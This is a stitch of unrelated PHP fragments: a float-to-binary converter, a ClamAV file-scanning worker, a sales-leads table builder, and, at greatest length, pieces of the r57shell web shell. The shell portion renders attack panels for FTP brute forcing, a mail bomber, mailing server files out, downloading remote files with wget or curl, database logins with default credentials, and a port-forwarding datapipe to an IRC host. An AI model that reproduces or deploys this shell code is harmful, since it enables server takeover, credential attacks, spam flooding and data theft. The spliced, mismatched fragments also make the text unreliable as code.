function main($num) { if ($num < 0) { $s = 1; $num = -$num; } else { $s = 0; } $zs = floor($num); $bzs = decbin($zs); $xs = $num - $zs; $res = (double) ($bzs . '.' . tenToBinary($xs, 1)); $teme = ws($res); $e = decbin($teme + 127); if ($teme == 0) { $e = '0' . $e; } $temm = $res / pow(10, $teme); $m = end(explode(".", $temm)); $lenm = strlen($m); if ($lenm < 23) { $m .= addzero(23 - $lenm); } return $s . ' ' . $e . ' ' . $m . ' '; }
echo sr(25, "<b>" . $lang[$language . '_text90'] . $arrow . "</b>", "<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>" . in('hidden', 'dir', 0, $dir)); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt14'])); echo $te . "</td>" . $fe . $fs . "<td valign=top width=50%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text100'] . "</div></b></font>"; echo sr(25, "<b>" . $lang[$language . '_text88'] . $arrow . "</b>", in('text', 'ftp_server_port', 45, !empty($_POST['ftp_server_port']) ? $_POST['ftp_server_port'] : "127.0.0.1:21")); echo sr(25, "<b>" . $lang[$language . '_text37'] . $arrow . "</b>", in('text', 'ftp_login', 45, !empty($_POST['ftp_login']) ? $_POST['ftp_login'] : "******")); echo sr(25, "<b>" . $lang[$language . '_text38'] . $arrow . "</b>", in('text', 'ftp_password', 45, !empty($_POST['ftp_password']) ? $_POST['ftp_password'] : "******")); echo sr(25, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 45, $dir)); echo sr(25, "<b>" . $lang[$language . '_text89'] . $arrow . "</b>", in('text', 'ftp_file', 45, !empty($_POST['ftp_file']) ? $_POST['ftp_file'] : "/ftp-dir/file") . in('hidden', 'cmd', 0, 'ftp_file_up')); echo sr(25, "<b>" . $lang[$language . '_text90'] . $arrow . "</b>", "<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>" . in('hidden', 'dir', 0, $dir)); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt2'])); echo $te . "</td>" . $fe . "</tr></div></table>"; } if ($unix && @function_exists("ftp_connect")) { echo $fs . $table_up1 . $lang[$language . '_text94'] . up_down('id18') . $table_up2 . div('id18') . $ts; echo sr(15, "<b>" . $lang[$language . '_text88'] . $arrow . "</b>", in('text', 'ftp_server_port', 85, !empty($_POST['ftp_server_port']) ? $_POST['ftp_server_port'] : "127.0.0.1:21") . in('hidden', 'cmd', 0, 'ftp_brute') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1'])); echo sr(15, "", "<font face=Verdana size=-2>" . $lang[$language . '_text99'] . " ( <a href=" . $_SERVER['PHP_SELF'] . "?users>" . $lang[$language . '_text95'] . "</a> )</font>"); echo sr(15, "", in('checkbox', 'reverse id=reverse', 0, '1') . $lang[$language . '_text101']); echo $te . '</div>' . $table_end1 . $fe; } if (@function_exists("mail")) { echo $table_up1 . $lang[$language . '_text102'] . up_down('id19') . $table_up2 . div('id19') . $ts . "<tr>" . $fs . "<td valign=top width=50%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text103'] . "</div></b></font>"; echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 45, !empty($_POST['to']) ? $_POST['to'] : "*****@*****.**") . in('hidden', 'cmd', 0, 'mail') . in('hidden', 'dir', 0, $dir)); echo sr(25, "<b>" . $lang[$language . '_text106'] . $arrow . "</b>", in('text', 'from', 45, !empty($_POST['from']) ? $_POST['from'] : "*****@*****.**")); echo sr(25, "<b>" . $lang[$language . '_text107'] . $arrow . "</b>", in('text', 'subj', 45, !empty($_POST['subj']) ? $_POST['subj'] : "hello billy")); echo sr(25, "<b>" . $lang[$language . '_text108'] . $arrow . "</b>", '<textarea name=text cols=33 rows=2>' . (!empty($_POST['text']) ? $_POST['text'] : "mail text here") . '</textarea>'); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15'])); echo $te . "</td>" . $fe . $fs . "<td valign=top width=50%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text104'] . "</div></b></font>"; echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 45, !empty($_POST['to']) ? $_POST['to'] : "*****@*****.**") . in('hidden', 'cmd', 0, 'mail_file') . in('hidden', 'dir', 0, $dir));
echo $fs . $table_up1 . $lang[$language . '_text85'] . $table_up2 . $ts; echo sr(15, "<b>" . $lang[$language . '_text36'] . $arrow . "</b>", in('text', 'test4_md', 15, !empty($_POST['test4_md']) ? $_POST['test4_md'] : "master") . ws(4) . "<b>" . $lang[$language . '_text37'] . $arrow . "</b>" . in('text', 'test4_ml', 15, !empty($_POST['test4_ml']) ? $_POST['test4_ml'] : "sa") . ws(4) . "<b>" . $lang[$language . '_text38'] . $arrow . "</b>" . in('text', 'test4_mp', 15, !empty($_POST['test4_mp']) ? $_POST['test4_mp'] : "password") . ws(4) . "<b>" . $lang[$language . '_text14'] . $arrow . "</b>" . in('text', 'test4_port', 15, !empty($_POST['test4_port']) ? $_POST['test4_port'] : "1433")); echo sr(15, "<b>" . $lang[$language . '_text3'] . $arrow . "</b>", in('text', 'test4_file', 96, !empty($_POST['test4_file']) ? $_POST['test4_file'] : "dir") . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test4') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . $table_end1 . $fe; } if (@ini_get('file_uploads')) { echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; echo $table_up1 . $lang[$language . '_text5'] . $table_up2 . $ts; echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile', 85, '')); echo sr(15, "<b>" . $lang[$language . '_text21'] . $arrow . "</b>", in('checkbox', 'nf1 id=nf1', 0, '1') . in('text', 'new_name', 82, '') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2'])); echo $te . $table_end1 . $fe; } if (!$safe_mode && !$windows) { echo $fs . $table_up1 . $lang[$language . '_text15'] . $table_up2 . $ts; echo sr(15, "<b>" . $lang[$language . '_text16'] . $arrow . "</b>", "<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>" . in('hidden', 'dir', 0, $dir) . ws(2) . "<b>" . $lang[$language . '_text17'] . $arrow . "</b>" . in('text', 'rem_file', 78, 'http://')); echo sr(15, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 105, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2'])); echo $te . $table_end1 . $fe; } if ($mysql_on || $mssql_on || $pg_on || $ora_on) { echo $table_up1 . $lang[$language . '_text82'] . $table_up2 . $ts . "<tr>" . $fs . "<td valign=top width=34%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center>" . $lang[$language . '_text77'] . "</div></b></font>"; echo sr(45, "<b>" . $lang[$language . '_text80'] . $arrow . "</b>", "<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); echo sr(45, "<b>" . $lang[$language . '_text14'] . $arrow . "</b>", in('text', 'db_port', 15, !empty($_POST['db_port']) ? $_POST['db_port'] : "3306")); echo sr(45, "<b>" . $lang[$language . '_text37'] . $arrow . "</b>", in('text', 'mysql_l', 15, !empty($_POST['mysql_l']) ? $_POST['mysql_l'] : "root")); echo sr(45, "<b>" . $lang[$language . '_text38'] . $arrow . "</b>", in('text', 'mysql_p', 15, !empty($_POST['mysql_p']) ? $_POST['mysql_p'] : "password")); echo sr(45, "<b>" . $lang[$language . '_text78'] . $arrow . "</b>", in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'db_show') . in('checkbox', 'st id=st', 0, '1')); echo sr(45, "<b>" . $lang[$language . '_text79'] . $arrow . "</b>", in('checkbox', 'sc id=sc', 0, '1')); echo sr(45, "", in('submit', 'submit', 0, $lang[$language . '_butt7'])); echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center>" . $lang[$language . '_text40'] . "</div></b></font>"; echo sr(45, "<b>" . $lang[$language . '_text80'] . $arrow . "</b>", "<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
if (!$safe_mode && !$windows) { echo "<div align=center><form name=datapipe method=POST>"; echo $table_up1; echo $lang[$language . '_text22']; echo $table_up2; echo $font; echo "<b>" . ws(2) . $lang[$language . '_text23'] . $arrow . ws(1) . "</b>"; echo "<input type=text name=local_port size=5 value=\"31337\">" . ws(1); echo "<b>" . ws(2) . $lang[$language . '_text24'] . $arrow . ws(1) . "</b>"; echo "<input type=text name=remote_host size=15 value=\"irc.dalnet.ru\">" . ws(1); echo "<b>" . ws(2) . $lang[$language . '_text25'] . $arrow . ws(1) . "</b>"; echo "<input type=text name=remote_port size=5 value=\"6667\">" . ws(1); echo "<b>" . ws(2) . $lang[$language . '_text26'] . $arrow . ws(1) . "</b>"; echo "<select size=\"1\" name=\"use\">"; echo "<option value=\"Perl\">datapipe.pl</option>"; echo "<option value=\"C\">datapipe.c</option>"; echo "</select> "; echo ws(2) . "<input type=submit name=submit value=\" " . $lang[$language . '_butt5'] . " \">"; echo "<input type=hidden name=dir value=" . $dir . ">"; echo "</font>"; echo $table_end1; echo "</form></div>"; } //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~// /// end table echo "</table>"; /* (c) */ echo $table_up3; echo "<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RusH security team | <a href=http://rst.void.ru>http://rst.void.ru</a> | version " . $version . " ]---o</b></font></div>"; echo "</td></tr></table>{$f}"; /* -------------------------[ EOF ]------------------------- */
$path = $config['directorio_ficheros'] . '/' . $fid; debug('Escaneando ' . $fid); $resav = $av->scan($path); if ($resav[0] == 2) { // Error pasando clamav debug("Error con " . $fid . ": " . $resav[1]); $exito = ws($fid, 'ERROR', $resav[1]); $pheanstalk->bury($job); } elseif ($resav[0] == 1) { // Infectado debug("Fichero " . $fid . " infectado: " . $resav[1]); $exito = ws($fid, 'INFECTADO', $resav[1]); } else { // Limpio debug("Fichero " . $fid . " limpio "); $exito = ws($fid, 'LIMPIO', ''); } } // Liberamos... o esperamos if ($exito === TRUE) { $pheanstalk->delete($job); } else { $pheanstalk->release($job); debug("No funcionó bien " . $job->getData() . ". Esperando."); sleep(10); } } } } catch (Exception $e) { echo "Error!: " . var_export($e, TRUE) . "\n"; exit(1);
echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15'])); echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text104'] . "</div></b></font>"; echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 30, !empty($_POST['to']) ? $_POST['to'] : "*****@*****.**") . in('hidden', 'cmd', 0, 'mail_file') . in('hidden', 'dir', 0, $dir)); echo sr(25, "<b>" . $lang[$language . '_text106'] . $arrow . "</b>", in('text', 'from', 30, !empty($_POST['from']) ? $_POST['from'] : "*****@*****.**")); echo sr(25, "<b>" . $lang[$language . '_text107'] . $arrow . "</b>", in('text', 'subj', 30, !empty($_POST['subj']) ? $_POST['subj'] : "file from r57shell")); echo sr(25, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 30, $dir)); echo sr(25, "<b>" . $lang[$language . '_text91'] . $arrow . "</b>", in('radio', 'compress', 0, 'none', 1) . ' ' . $arh); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15'])); echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text139'] . "</div></b></font>"; echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 30, !empty($_POST['to']) ? $_POST['to'] : "*****@*****.**") . in('hidden', 'cmd', 0, 'mail_bomber') . in('hidden', 'dir', 0, $dir)); echo sr(25, "<b>" . $lang[$language . '_text106'] . $arrow . "</b>", in('text', 'from', 30, !empty($_POST['from']) ? $_POST['from'] : "*****@*****.**")); echo sr(25, "<b>" . $lang[$language . '_text107'] . $arrow . "</b>", in('text', 'subj', 30, !empty($_POST['subj']) ? $_POST['subj'] : "hello billy")); echo sr(25, "<b>" . $lang[$language . '_text108'] . $arrow . "</b>", '<textarea name=text cols=22 rows=1>' . (!empty($_POST['text']) ? $_POST['text'] : "flood text here") . '</textarea>'); echo sr(25, "<b>Flood" . $arrow . "</b>", in('int', 'mail_flood', 5, !empty($_POST['mail_flood']) ? $_POST['mail_flood'] : 100) . ws(4) . "<b>Size(kb)" . $arrow . "</b>" . in('int', 'mail_size', 5, !empty($_POST['mail_size']) ? $_POST['mail_size'] : 10)); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15'])); echo $te . "</td>" . $fe . "</tr></div></table>"; } if ($mysql_on || $mssql_on || $pg_on || $ora_on) { $select = '<select name=db>'; if ($mysql_on) { $select .= '<option>MySQL</option>'; } if ($mssql_on) { $select .= '<option>MSSQL</option>'; } if ($pg_on) { $select .= '<option>PostgreSQL</option>'; } if ($ora_on) {
function getTbody(){ global $DB; global $numCols; global $rightsfilter; $where = (strlen(getCriteria())) ?getCriteria() :' status = "pending" '; $where .= ' AND '.$rightsfilter; $sql = "SELECT *, CONCAT('$',estimated) as estimated FROM leads WHERE ".$where." ORDER BY company, customer"; //print $sql; $res = $DB->query($sql); $ret = '<tbody id="mtb">'."\n"; while($r = $DB->fetchNextObject($res)){ $ret .= "\t"; $ret .= '<tr id="row'.$r->id.'">'; $ret .= '<td align="center">'; $ret .= stripslashes(ws($r->id)); $ret .= '</td>'; $ret .= '<td>'; $ret .= stripslashes(ws($r->jobname)); $ret .= '</td>'; $ret .= '<td>'; $ret .= stripslashes(ws($r->company)); $ret .= '</td>'; $ret .= '<td>'; $ret .= stripslashes(ws($r->customer)); $ret .= '</td>'; $ret .= '<td>'; $ret .= ws(dateFix($r->targetdate)); $ret .= '</td>'; // the date closed field if($r->status == 'closed'){ $statushtml = dateFix($r->dateclosed); $hideclass = 'class="hideclosed"'; }else{ if(strlen($r->reason) > 0){ $repreason = ($r->reason_repid) ?'<i><small><br /><br />-'.getRep($r->reason_repid).'-</small></i>' :''; $reason = $r->reason."\n\n"; $statushtml = '<a href="#" rel="'.$reason.'" class="moreinfo" title="'.$reason.$repreason.'">'.$r->status.'</a>'; }else{ $statushtml = $r->status; } $hideclass = ''; } $ret .= '<td '.$hideclass.'>'; $ret .= ws($statushtml); $ret .= '</td>'; $ret .= '<td>'; $ret .= ws(dateFix($r->createdon)); $ret .= '</td>'; $ret .= '<td align="center">'; $ret .= ws(getRepField($r->quotedby_repid, 'LOWER(CONCAT(SUBSTRING(firstname, 1, 1), SUBSTRING(lastname, 1, 1)))')); $ret .= '</td>'; $ret .= '<td>'; $ret .= ($r->rep == 0)?'n/a':getRep($r->rep); $ret .= '</td>'; $ret .= '<td>'; $ret .= $r->estimated; $ret .= '</td>'; $ret .= '<td>'; $ret .= (strlen($r->quotefile) > 0) ?'<a href="_lib/php/forcedownload.php?filename='.stripslashes($r->quotefile).'"> <img src="images/quote_icon.png" width="16" height="16" border="0" title="view attachment" /> </a>' :ws(''); $ret .= '</td>'; $ret .= '<td id="'.$r->id.'" class="actionbt">action'; $ret .= '<input id="comments_'.$r->id.'" type="hidden" value="'.$r->comments.'" />'; // get the comments // get the project info $info = ''; $info .= 'created by: '.getRep($r->createdby_repid)."\n"; $info .= 'created on: '.dateFix($r->createdon)."\n\n"; $info .= 'last updated by: '.getRep($r->lastupdatedby_repid)."\n"; $info .= 'last updated on: '.dateFix($r->lastupdated)."\n\n"; $ret .= '<input id="info_'.$r->id.'" type="hidden" value="'.$info.'" />'; // get the prospect info $ret .= '</td>'; $ret .= '</tr>'."\n"; } // show a row with no results if(($DB->numRows($res) < 1)){ $ret .= '<tr id="nores">'; $ret.='<td colspan="'.$numCols.'" >No results found</td>'; $ret .='</tr>'; } $ret .= '</tbody>'; return $ret; }